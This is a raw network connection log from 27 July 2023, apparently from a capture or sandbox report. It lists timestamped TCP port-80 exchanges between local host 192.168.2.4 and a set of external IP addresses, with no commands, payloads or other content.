                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:22.648618937 CEST4972480192.168.2.4104.21.55.224
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:22.668525934 CEST4972380192.168.2.4185.80.51.179
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:22.669157028 CEST4972480192.168.2.4104.21.55.224
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:22.685995102 CEST8049724104.21.55.224192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:22.700361013 CEST8049724104.21.55.224192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:22.700462103 CEST4972480192.168.2.4104.21.55.224
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:22.700650930 CEST8049717170.82.174.30192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:22.706917048 CEST8049723185.80.51.179192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:22.707619905 CEST8049723185.80.51.179192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:22.707811117 CEST4972380192.168.2.4185.80.51.179
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:22.744856119 CEST8049721202.254.236.40192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:22.745037079 CEST4972180192.168.2.4202.254.236.40
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:22.749713898 CEST804972260.43.154.138192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:22.750838995 CEST4972280192.168.2.460.43.154.138
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:22.799395084 CEST4972180192.168.2.4202.254.236.40
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:22.799521923 CEST4972380192.168.2.4185.80.51.179
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:22.799662113 CEST4972280192.168.2.460.43.154.138
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:22.834770918 CEST4972580192.168.2.4193.166.255.171
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:22.838077068 CEST8049723185.80.51.179192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:22.838192940 CEST4972380192.168.2.4185.80.51.179
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:22.888561010 CEST4972680192.168.2.469.163.239.62
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:22.949835062 CEST4972780192.168.2.446.242.238.60
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:22.955049992 CEST4972880192.168.2.4108.167.164.216
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:22.965509892 CEST4972980192.168.2.43.94.41.167
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:22.980324030 CEST804972746.242.238.60192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:22.980423927 CEST4972780192.168.2.446.242.238.60
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:22.980784893 CEST4972780192.168.2.446.242.238.60
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:22.985110998 CEST8049717170.82.174.30192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:22.985215902 CEST4971780192.168.2.4170.82.174.30
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:23.002551079 CEST4971780192.168.2.4170.82.174.30
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:23.011147022 CEST804972746.242.238.60192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:23.012135983 CEST804972746.242.238.60192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:23.014939070 CEST4972780192.168.2.446.242.238.60
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:23.054814100 CEST804972669.163.239.62192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:23.054985046 CEST4972680192.168.2.469.163.239.62
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:23.064594030 CEST4972680192.168.2.469.163.239.62
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:23.078592062 CEST8049728108.167.164.216192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:23.078746080 CEST4972880192.168.2.4108.167.164.216
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:23.079293966 CEST8049706104.26.15.53192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:23.079346895 CEST8049706104.26.15.53192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:23.079390049 CEST8049706104.26.15.53192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:23.079396963 CEST4970680192.168.2.4104.26.15.53
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:23.079437017 CEST8049706104.26.15.53192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:23.079438925 CEST4970680192.168.2.4104.26.15.53
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:23.079462051 CEST4970680192.168.2.4104.26.15.53
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:23.079483986 CEST8049706104.26.15.53192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:23.079494953 CEST4970680192.168.2.4104.26.15.53
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:23.079530001 CEST8049706104.26.15.53192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:23.079539061 CEST4970680192.168.2.4104.26.15.53
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:23.079576969 CEST8049706104.26.15.53192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:23.079590082 CEST4970680192.168.2.4104.26.15.53
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:23.079623938 CEST8049706104.26.15.53192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:23.079673052 CEST4970680192.168.2.4104.26.15.53
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:23.079674006 CEST8049706104.26.15.53192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:23.079741955 CEST4970680192.168.2.4104.26.15.53
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:23.079756975 CEST8049706104.26.15.53192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:23.079806089 CEST4970680192.168.2.4104.26.15.53
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:23.079936028 CEST8049721202.254.236.40192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:23.080225945 CEST8049706104.26.15.53192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:23.080319881 CEST4970680192.168.2.4104.26.15.53
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:23.080329895 CEST8049706104.26.15.53192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:23.080384016 CEST8049706104.26.15.53192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:23.080419064 CEST4970680192.168.2.4104.26.15.53
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:23.080431938 CEST8049706104.26.15.53192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:23.080478907 CEST8049706104.26.15.53192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:23.080518961 CEST4970680192.168.2.4104.26.15.53
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:23.080642939 CEST4970680192.168.2.4104.26.15.53
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:23.081229925 CEST8049706104.26.15.53192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:23.081278086 CEST8049706104.26.15.53192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:23.081302881 CEST4970680192.168.2.4104.26.15.53
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:23.081322908 CEST8049706104.26.15.53192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:23.081326962 CEST4970680192.168.2.4104.26.15.53
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:23.081372023 CEST4970680192.168.2.4104.26.15.53
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:23.081386089 CEST8049706104.26.15.53192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:23.081445932 CEST8049706104.26.15.53192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:23.081484079 CEST8049721202.254.236.40192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:23.081492901 CEST4970680192.168.2.4104.26.15.53
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:23.081614971 CEST4972180192.168.2.4202.254.236.40
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:23.082204103 CEST8049706104.26.15.53192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:23.082252026 CEST8049706104.26.15.53192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:23.082281113 CEST4970680192.168.2.4104.26.15.53
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:23.082297087 CEST8049706104.26.15.53192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:23.082298994 CEST4970680192.168.2.4104.26.15.53
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:23.082344055 CEST8049706104.26.15.53192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:23.082348108 CEST4970680192.168.2.4104.26.15.53
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:23.082391977 CEST8049706104.26.15.53192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:23.082392931 CEST4970680192.168.2.4104.26.15.53
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:23.082438946 CEST4970680192.168.2.4104.26.15.53
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:23.083156109 CEST8049706104.26.15.53192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:23.083214045 CEST8049706104.26.15.53192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:23.083259106 CEST8049706104.26.15.53192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:23.083291054 CEST4970680192.168.2.4104.26.15.53
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:23.083303928 CEST8049706104.26.15.53192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:23.083321095 CEST4970680192.168.2.4104.26.15.53
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:23.083349943 CEST8049706104.26.15.53192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:23.083401918 CEST4970680192.168.2.4104.26.15.53
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:23.084903955 CEST804972260.43.154.138192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:23.085669994 CEST804972260.43.154.138192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:23.087099075 CEST4972280192.168.2.460.43.154.138
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:23.096007109 CEST8049706104.26.15.53192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:23.096112967 CEST4970680192.168.2.4104.26.15.53
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:23.096153975 CEST8049706104.26.15.53192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:23.096211910 CEST8049706104.26.15.53192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:23.096227884 CEST4970680192.168.2.4104.26.15.53
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:23.096256971 CEST8049706104.26.15.53192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:23.096270084 CEST4970680192.168.2.4104.26.15.53
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:23.096328020 CEST4970680192.168.2.4104.26.15.53
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:23.096370935 CEST8049706104.26.15.53192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:23.096419096 CEST8049706104.26.15.53192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:23.096421957 CEST4970680192.168.2.4104.26.15.53
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:23.096466064 CEST8049706104.26.15.53192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:23.096468925 CEST4970680192.168.2.4104.26.15.53
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:23.096513033 CEST4970680192.168.2.4104.26.15.53
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:23.097116947 CEST8049706104.26.15.53192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:23.097187042 CEST4970680192.168.2.4104.26.15.53
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:23.097234011 CEST8049706104.26.15.53192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:23.097295046 CEST8049706104.26.15.53192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:23.097296000 CEST4970680192.168.2.4104.26.15.53
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:23.097342014 CEST8049706104.26.15.53192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:23.097345114 CEST4970680192.168.2.4104.26.15.53
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:23.097388983 CEST8049706104.26.15.53192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:23.097393036 CEST4970680192.168.2.4104.26.15.53
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:23.097440958 CEST4970680192.168.2.4104.26.15.53
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:23.098067045 CEST8049706104.26.15.53192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:23.098115921 CEST8049706104.26.15.53192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:23.098156929 CEST4970680192.168.2.4104.26.15.53
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:23.098160982 CEST8049706104.26.15.53192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:23.098171949 CEST4970680192.168.2.4104.26.15.53
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:23.098207951 CEST8049706104.26.15.53192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:23.098212957 CEST4970680192.168.2.4104.26.15.53
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:23.098259926 CEST4970680192.168.2.4104.26.15.53
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:23.098273993 CEST8049706104.26.15.53192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:23.098332882 CEST4970680192.168.2.4104.26.15.53
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:23.099019051 CEST8049706104.26.15.53192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:23.099069118 CEST8049706104.26.15.53192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:23.099112988 CEST8049706104.26.15.53192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:23.099143982 CEST4970680192.168.2.4104.26.15.53
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:23.099159002 CEST8049706104.26.15.53192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:23.099185944 CEST4970680192.168.2.4104.26.15.53
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:23.099198103 CEST8049706104.26.15.53192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:23.099219084 CEST4970680192.168.2.4104.26.15.53
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:23.099247932 CEST4970680192.168.2.4104.26.15.53
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:23.100656033 CEST8049706104.26.15.53192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:23.100729942 CEST8049706104.26.15.53192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:23.100735903 CEST4970680192.168.2.4104.26.15.53
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:23.100783110 CEST4970680192.168.2.4104.26.15.53
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:23.100795984 CEST8049706104.26.15.53192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:23.100845098 CEST4970680192.168.2.4104.26.15.53
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:23.100847960 CEST8049706104.26.15.53192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:23.100893974 CEST8049706104.26.15.53192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:23.100898981 CEST4970680192.168.2.4104.26.15.53
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:23.100943089 CEST4970680192.168.2.4104.26.15.53
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:23.101052046 CEST8049706104.26.15.53192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:23.101095915 CEST8049706104.26.15.53192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:23.101099968 CEST4970680192.168.2.4104.26.15.53
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:23.101140022 CEST8049706104.26.15.53192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:23.101147890 CEST4970680192.168.2.4104.26.15.53
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:23.101185083 CEST8049706104.26.15.53192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:23.101186991 CEST4970680192.168.2.4104.26.15.53
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:23.101233006 CEST4970680192.168.2.4104.26.15.53
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:23.101233006 CEST8049706104.26.15.53192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:23.101281881 CEST4970680192.168.2.4104.26.15.53
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:23.102055073 CEST8049706104.26.15.53192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:23.102103949 CEST8049706104.26.15.53192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:23.102137089 CEST4970680192.168.2.4104.26.15.53
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:23.102149963 CEST8049706104.26.15.53192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:23.102153063 CEST4970680192.168.2.4104.26.15.53
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:23.102195024 CEST8049706104.26.15.53192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:23.102197886 CEST4970680192.168.2.4104.26.15.53
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:23.102241993 CEST8049706104.26.15.53192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:23.102257967 CEST4970680192.168.2.4104.26.15.53
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:23.102298975 CEST4970680192.168.2.4104.26.15.53
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:23.102973938 CEST4969080192.168.2.4137.118.26.67
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:23.103055954 CEST8049706104.26.15.53192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:23.103105068 CEST8049706104.26.15.53192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:23.103136063 CEST4970680192.168.2.4104.26.15.53
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:23.103149891 CEST8049706104.26.15.53192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:23.103163958 CEST4970680192.168.2.4104.26.15.53
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:23.103194952 CEST8049706104.26.15.53192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:23.103208065 CEST4970680192.168.2.4104.26.15.53
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:23.103241920 CEST8049706104.26.15.53192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:23.103251934 CEST4970680192.168.2.4104.26.15.53
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:23.103319883 CEST4970680192.168.2.4104.26.15.53
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:23.104022980 CEST8049706104.26.15.53192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:23.104072094 CEST8049706104.26.15.53192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:23.104087114 CEST4970680192.168.2.4104.26.15.53
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:23.104118109 CEST8049706104.26.15.53192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:23.104123116 CEST4970680192.168.2.4104.26.15.53
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:23.104162931 CEST8049706104.26.15.53192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:23.104165077 CEST4970680192.168.2.4104.26.15.53
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:23.104207993 CEST4970680192.168.2.4104.26.15.53
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:23.104208946 CEST8049706104.26.15.53192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:23.104258060 CEST4970680192.168.2.4104.26.15.53
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:23.104970932 CEST8049706104.26.15.53192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:23.105020046 CEST8049706104.26.15.53192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:23.105036974 CEST4970680192.168.2.4104.26.15.53
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:23.105065107 CEST8049706104.26.15.53192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:23.105073929 CEST4970680192.168.2.4104.26.15.53
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:23.105110884 CEST4970680192.168.2.4104.26.15.53
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:23.105113029 CEST8049706104.26.15.53192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:23.105158091 CEST8049706104.26.15.53192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:23.105159044 CEST4970680192.168.2.4104.26.15.53
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:23.105202913 CEST4970680192.168.2.4104.26.15.53
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:23.105370045 CEST80497293.94.41.167192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:23.105482101 CEST4972980192.168.2.43.94.41.167
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:23.105954885 CEST8049706104.26.15.53192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:23.106014967 CEST4970680192.168.2.4104.26.15.53
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:23.106019974 CEST8049706104.26.15.53192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:23.106066942 CEST8049706104.26.15.53192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:23.106112957 CEST8049706104.26.15.53192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:23.106128931 CEST4970680192.168.2.4104.26.15.53
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:23.106158972 CEST8049706104.26.15.53192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:23.106177092 CEST4970680192.168.2.4104.26.15.53
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:23.106213093 CEST4970680192.168.2.4104.26.15.53
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:23.112684011 CEST8049706104.26.15.53192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:23.112730980 CEST8049706104.26.15.53192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:23.112772942 CEST8049706104.26.15.53192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:23.112771988 CEST4970680192.168.2.4104.26.15.53
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:23.112818003 CEST4970680192.168.2.4104.26.15.53
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:23.112833977 CEST8049706104.26.15.53192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:23.112837076 CEST4970680192.168.2.4104.26.15.53
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:23.112878084 CEST4970680192.168.2.4104.26.15.53
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:23.112879992 CEST8049706104.26.15.53192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:23.112936020 CEST4970680192.168.2.4104.26.15.53
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:23.113054037 CEST8049706104.26.15.53192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:23.113099098 CEST8049706104.26.15.53192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:23.113109112 CEST4970680192.168.2.4104.26.15.53
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:23.113140106 CEST8049706104.26.15.53192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:23.113142967 CEST4970680192.168.2.4104.26.15.53
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:23.113181114 CEST8049706104.26.15.53192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:23.113183975 CEST4970680192.168.2.4104.26.15.53
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:23.113223076 CEST8049706104.26.15.53192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:23.113223076 CEST4970680192.168.2.4104.26.15.53
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:23.113267899 CEST4970680192.168.2.4104.26.15.53
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:23.114057064 CEST8049706104.26.15.53192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:23.114100933 CEST8049706104.26.15.53192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:23.114136934 CEST4970680192.168.2.4104.26.15.53
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:23.114141941 CEST8049706104.26.15.53192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:23.114156008 CEST4970680192.168.2.4104.26.15.53
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:23.114183903 CEST8049706104.26.15.53192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:23.114201069 CEST4970680192.168.2.4104.26.15.53
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:23.114224911 CEST8049706104.26.15.53192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:23.114243984 CEST4970680192.168.2.4104.26.15.53
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:23.114274025 CEST4970680192.168.2.4104.26.15.53
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:23.114986897 CEST8049706104.26.15.53192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:23.115031958 CEST8049706104.26.15.53192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:23.115072012 CEST8049706104.26.15.53192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:23.115111113 CEST8049706104.26.15.53192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:23.115113020 CEST4970680192.168.2.4104.26.15.53
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:23.115143061 CEST4970680192.168.2.4104.26.15.53
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:23.115153074 CEST8049706104.26.15.53192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:23.115168095 CEST4970680192.168.2.4104.26.15.53
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:23.115209103 CEST4970680192.168.2.4104.26.15.53
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:23.115925074 CEST8049706104.26.15.53192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:23.115967035 CEST8049706104.26.15.53192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:23.115992069 CEST4970680192.168.2.4104.26.15.53
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:23.116007090 CEST8049706104.26.15.53192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:23.116023064 CEST4970680192.168.2.4104.26.15.53
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:23.116050005 CEST8049706104.26.15.53192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:23.116055012 CEST4970680192.168.2.4104.26.15.53
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:23.116092920 CEST8049706104.26.15.53192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:23.116096020 CEST4970680192.168.2.4104.26.15.53
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:23.116138935 CEST4970680192.168.2.4104.26.15.53
